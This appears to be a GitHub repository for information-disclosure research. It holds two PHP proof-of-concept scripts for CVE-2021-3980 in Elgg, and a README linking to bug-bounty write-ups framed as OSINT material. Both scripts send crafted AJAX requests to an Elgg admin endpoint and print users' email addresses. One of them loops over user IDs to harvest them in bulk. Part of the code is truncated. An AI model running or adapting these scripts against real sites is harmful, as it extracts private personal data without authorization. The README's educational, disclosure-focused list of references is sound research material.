├── CVE-2021-3980-multi.php ├── CVE-2021-3980.php └── README.md /CVE-2021-3980-multi.php: -------------------------------------------------------------------------------- 1 | = 40; $i-- ) { 13 | curl_setopt($ch, CURLOPT_URL, 'http://'.$host.'/elgg/ajax/form/admin/user/change_email?user_guid='.$i); 14 | curl_setopt($ch,CURLOPT_HTTPHEADER,array( 15 | 'X-Requested-With:XMLHttpRequest', 16 | 'X-Elgg-Ajax-API:2' 17 | )); 18 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); 19 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 20 | 21 | $content = curl_exec($ch); 22 | $content = json_decode($content, false); 23 | 24 | $dom = new DOMDocument; 25 | $dom->loadHTML($content->value); 26 | $attr = array(); 27 | $tg = "input"; 28 | $inputs = $dom->getElementsByTagName($tg); 29 | 30 | if(sizeof($inputs) == 4) { 31 | foreach ($inputs as $tag) { 32 | array_push($attr, $tag->getAttribute("value")); 33 | } 34 | echo end($attr) . "\n"; 35 | } 36 | } 37 | 38 | ?> -------------------------------------------------------------------------------- /CVE-2021-3980.php: -------------------------------------------------------------------------------- 1 | loadHTML($content->value); 22 | $attr = array(); 23 | $tg = "input"; 24 | $inputs = $dom->getElementsByTagName($tg); 25 | 26 | foreach ($inputs as $tag) { 27 | array_push($attr, $tag->getAttribute("value")); 28 | } 29 | 30 | echo "The e-mail of the admin is ". end($attr) . " :)\n"; 31 | 32 | ?> -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Information Disclosure Write-Ups And PoCs 2 | 3 | This is a list of write-ups, articles, and PoCs for various vulnerabilities (or just flaws) that are **interesting in the context of OSINT** (mostly CWE-200). 4 | 5 | For educational purposes only! By studying this content, you will understand how to find similar vulnerabilities in other systems. 
6 | 7 | All write-ups are also archived in [archive.md](https://archive.md/). 8 | 9 | | Name | PoCs | 10 | | ------------- | ------------- | 11 | | [brutecat.com - Leaking the email of any YouTube user for $10,000](https://brutecat.com/articles/leaking-youtube-emails) | | 12 | | [Breno Vitório - Exposure of Private Personal Information to an Unauthorized Actor in elgg/elgg](https://huntr.dev/bounties/1f43f11e-4bd8-451f-a244-dc9541cdc0ac/) | [PoC 1](./CVE-2021-3980.php), [PoC 2](/CVE-2021-3980-multi.php) | 13 | | [Abhishek Pathak - This is how i was able to See and Delete your Private Facebook Portal photos](https://pathleax.medium.com/this-is-how-i-was-able-to-see-and-delete-your-private-facebook-portal-photos-a93ed22f875b) | - | 14 | | [Tom Anthony - Google Exploit – Steal Account Login Email Addresses](https://www.tomanthony.co.uk/blog/google-exploit-steal-login-email-addresses/) | - | 15 | | [mangopdf - When you browse Instagram and find former Australian Prime Minister Tony Abbott's passport number](https://mango.pdf.zone/finding-former-australian-prime-minister-tony-abbotts-passport-number-on-instagram) | - | 16 | | [Mohamed A. 
Baset - The 2.5mins or 2.5k$ hawk-eye bug - A Facebook Pages Admins Disclosure Vulnerability!](https://seekurity.com/blog/2018/02/25/admin/general/the-2-5mins-or-2-5k-hawk-eye-bug-a-facebook-pages-admins-disclosure-vulnerability) | - | 17 | | [Youssef Sammouda - Expose the email address of Workplace users](https://ysamm.com/?p=588) | - | 18 | | [Dávid Schütz - IDOR on clientauthconfig.googleapis.com](https://feed.bugs.xdavidhu.me/bugs/0009) | - | 19 | | [Dávid Schütz - De-anonymising Anonymous Animals in Google Workspace](https://feed.bugs.xdavidhu.me/bugs/0003) | - | 20 | | [Dávid Schütz - Stealing Your Private YouTube Videos, One Frame at a Time](https://bugs.xdavidhu.me/google/2021/01/11/stealing-your-private-videos-one-frame-at-a-time/) | - | 21 | | [Jerry Shah (Jerry) - Users Information Disclosure - WordPress CMS](https://shahjerry33.medium.com/information-disclosure-wordpress-cms-82133480b8b3), [HackerOne](https://hackerone.com/reports/1735586) | - | 22 | | [th3.d1p4k - Microsoft bug bounty writeup (Plesk-stat)](https://dewangpanchal98.medium.com/microsoft-bug-bounty-writeup-5ee4a7264dbf) | - | 23 | | [Minio Information Disclosure](https://www.pingsafe.com/blog/cve-2023-28432-minio-information-disclosure-vulnerability/) | [PoC](https://y4er.com/posts/minio-cve-2023-28432/) | 24 | | [Nextcloud Information Disclosure](https://hackerone.com/reports/1690510) | - | 25 | | [CVE-2020-9043 (WordPress)](https://nvd.nist.gov/vuln/detail/CVE-2020-9043) | - | 26 | | [CVE-2021-24917 (WordPress)](https://nvd.nist.gov/vuln/detail/CVE-2021-24917) | - | 27 | | [CVE-2022-2379 (WordPress)](https://nvd.nist.gov/vuln/detail/CVE-2022-2379) | - | 28 | | [CVE-2022-2462 (WordPress)](https://nvd.nist.gov/vuln/detail/CVE-2022-2462) | - | 29 | | [CVE-2022-2034 (WordPress)](https://nvd.nist.gov/vuln/detail/CVE-2022-2034), [HackerOne](https://hackerone.com/reports/1590237) | - | 30 | | [CVE-2022-1442 (WordPress)](https://nvd.nist.gov/vuln/detail/CVE-2022-1442) | 
[PoC](https://gist.github.com/Xib3rR4dAr/6e6c6e5fa1f8818058c7f03de1eda6bf) | 31 | --------------------------------------------------------------------------------